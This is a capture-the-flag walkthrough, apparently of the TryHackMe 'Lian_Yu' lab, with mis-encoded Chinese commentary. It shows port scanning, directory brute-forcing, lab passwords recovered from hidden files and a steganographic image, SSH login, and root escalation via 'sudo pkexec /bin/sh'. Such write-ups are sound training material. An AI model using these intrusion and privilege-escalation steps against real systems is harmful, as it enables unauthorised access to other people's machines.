Lian_Yu
็ซฏๅฃๆซๆโ
root@ip-10-10-219-129:~# nmap -sTCV -p 21,22,80,111 10.10.5.62
Starting Nmap 7.60 ( https://nmap.org ) at 2023-08-13 09:45 BST
Nmap scan report for ip-10-10-5-62.eu-west-1.compute.internal (10.10.5.62)
Host is up (0.00021s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey:
| 1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
| 2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
| 256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_ 256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (EdDSA)
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 43753/udp status
|_ 100024 1 55416/tcp status
MAC Address: 02:55:5F:68:41:6F (Unknown)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
80 - HTTPโ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu]
โโ$ gobuster dir -u http://10.10.217.19/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 150
/island (Status: 301) [Size: 234] [--> http://10.10.41.76/island/]
/server-status (Status: 403) [Size: 199]
ๆณจๆ่ฟ้็ๅพๆๆพๆฏ่ฏดไบไธ่ฌๅฏ่ฝๆฏ้่ไบ๏ผๆไปฌๆฅ็ๆบไปฃ็ ๅ็ฐๆไธไธชๅ่ฏ่ฟไธชๅฏ่ฝๆฏ็จๆทๅ: vigilante
ๅๆฌก็ฎๅฝๆซๆ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu]
โโ$ gobuster dir -u http://10.10.217.19/island -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 150
/2100 (Status: 301) [Size: 239] [--> http://10.10.41.76/island/2100/]
่ฟๅบ่ฏฅๆซๆๅฐๆๆ็ฎๅฝไบ๏ผๆไปฌๆฅ็ๆบไปฃ็ ๅ็ฐ๏ผ
ๅพๆๆพ่ฟๅญๅจไธไธช้่ๆไปถๅๆฌกๆซๆ
โโโ(jtzใฟJTZ)-[~]
โโ$ gobuster dir -u http://10.10.217.19/sitemap/2100/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-m
edium.txt -t 150 -o gobuster_80_2.txt -x .ticket
/green_arrow.ticket (Status: 200) [Size: 71]
่ฟ้ๆไปฌๅๆฌกๅพๅฐไธไธชๅญๆฎ๏ผๅฏ่ฝๆฏๅ ๅฏไฟกๆฏๆไปฌ่ฟ่ก่งฃๅฏ
- ๅฏ็ ๏ผ
!#th3h00d
21 - FTPโ
่ฟๅฏ่ฝๆฏไธไธช FTP ่ดฆๆท
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu]
โโ$ ftp 10.10.41.76
Connected to 10.10.41.76.
220 (vsFTPd 3.0.2)
Name (10.10.41.76:jtz): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33767|).
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
226 Directory send OK.
ๆไปฌไธ่ฝฝไธๆฅๅ ไธชๆไปถๅ่ฟ่กๆฅ็๏ผๅ็ฐๅ ถไธญ็ Leave_me_alone.png ๅญๅจไธไบ้ฎ้ข๏ผๆไปฌๆฅ็ๅ ถๅๅ ญ่ฟๅถๅ็ฐๆไปถๅคด้่ฏฏ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu]
โโ$ exiftool Leave_me_alone.png
ExifTool Version Number : 12.55
File Name : Leave_me_alone.png
Directory : .
File Size : 512 kB
File Modification Date/Time : 2020:05:01 10:26:06+08:00
File Access Date/Time : 2023:02:13 20:59:33+08:00
File Inode Change Date/Time : 2023:02:13 20:59:33+08:00
File Permissions : -rw-r--r--
Error : File format error
ๆไปฌไฝฟ็จ hexeditor ๆฅ็
่ฐทๆญๆ็ดข PNG ๆไปถๅคด่ฟ่กไฟฎๆน
่ฟ้ๅฏ่ฝ่ฎพ่ฎกๅฐๆไปถ้ๅๆฏ๏ผๆไปฌๆฅ็ๅ ถไปๅ ไธชๆไปถๆๆฒกๆ้ๅ ไฟกๆฏ
- aa.jpg ไธญๅญๅจไธไธช zip ๆไปถ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
โโ$ steghide info aa.jpg
"aa.jpg":
format: jpeg
capacity: 11.0 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "ss.zip":
size: 596.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
ๆไปฌๅฐๅ ถ่งฃๅ ๅๅ็ฐๅ ถไธญๆฏไธไธชๅฏ็ ๆไปถไธไธช็ฌ่ฎฐๆไปถ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
โโ$ unzip ss.zip
Archive: ss.zip
inflating: passwd.txt
inflating: shado
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
โโ$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
โโ$ cat shado
M3tahuman
็ฐๅจๆไปฌๅทฒ็ป่ทๅพไบๅฏ็ ไฝๆฏ็จๆทๆฏไปไน?ๆไปฌไธ็ฅ้
- ๆณจๆๅ ๆฅ็ไฝ ็ FTP ไฟกๆฏ๏ผไฝ ไผๅ็ฐไธไบไธไธๆ ท็ๅ ๅฎน
ftp> ls -al
229 Entering Extended Passive Mode (|||60095|).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 May 05 2020 .
drwxr-xr-x 4 0 0 4096 May 01 2020 .. # ไธ็บง็ฎๅฝไธ็ดๅพไธไฝ ไผๅ็ฐ็ดๆฅๆๆดไธช็ณป็ป็ปๅ
ฑไบซไบ
-rw------- 1 1001 1001 44 May 01 2020 .bash_history
-rw-r--r-- 1 1001 1001 220 May 01 2020 .bash_logout
-rw-r--r-- 1 1001 1001 3515 May 01 2020 .bashrc
-rw-r--r-- 1 0 0 2483 May 01 2020 .other_user
-rw-r--r-- 1 1001 1001 675 May 01 2020 .profile
-rw-r--r-- 1 0 0 511720 May 01 2020 Leave_me_alone.png
-rw-r--r-- 1 0 0 549924 May 05 2020 Queen's_Gambit.png
-rw-r--r-- 1 0 0 191026 May 01 2020 aa.jpg
ftp> cd /home
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||51601|).
150 Here comes the directory listing.
drwx------ 2 1000 1000 4096 May 01 2020 slade
drwxr-xr-x 2 1001 1001 4096 May 05 2020 vigilante
226 Directory send OK.
ๅๆธ้โ
sladeโ
โโโ(jtzใฟJTZ)-[~/Desktop/Temp/thm/Lian_Yu/T]
โโ$ ssh [email protected]
[email protected]'s password:
Way To SSH...
Loading.........Done..
Connecting To Lian_Yu Happy Hacking
โโโ โโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโ โโโโโโโโโโโโโโโโโโโ
โโโ โโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโ
โโโ โโ โโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโ
โโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโโโโ โโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโ
โโโโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโโโโ โโโโ โโโ โโโ โโโโโโ โโโ
โโโ โโโโโโโโโโโโโโโโ โโโ โโโโ โโโโโโโ โโโ
โโโ โโโโโโโโโโโโโโโโโ โโโ โโโโโโโ โโโ โโโ
โโโ โโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ
โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโโโโโ โโโโโโ โโโโโโโโโโโโโโโโ โโโโโโโ #
Last login: Mon Feb 13 07:46:39 2023 from ip-10-14-44-131.eu-west-1.compute.internal
slade@LianYu:~$ id
uid=1000(slade) gid=1000(slade) groups=1000(slade),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)
slade@LianYu:~$
slade --> rootโ
slade@LianYu:~$ sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User slade may run the following commands on LianYu:
(root) PASSWD: /usr/bin/pkexec
slade@LianYu:~$ sudo pkexec /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)